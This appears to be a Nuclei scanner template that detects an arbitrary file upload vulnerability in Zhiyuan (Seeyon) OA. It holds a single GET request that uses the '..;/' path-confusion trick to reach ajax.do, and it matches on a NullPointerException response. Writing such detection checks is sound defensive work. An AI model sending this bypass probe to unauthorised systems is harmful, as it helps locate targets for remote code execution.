id: zhiyuan-file-upload

info:
  name: Zhiyuan Oa arbitrary file upload vulnerability
  author: gy741
  severity: critical
  reference: https://www.programmersought.com/article/92658169875/
  tags: zhiyuan,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/seeyon/thirdpartyController.do.css/..;/ajax.do"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "java.lang.NullPointerException:null"

      - type: word
        words:
          - "text/html"
        part: header

      - type: status
        status:
          - 200
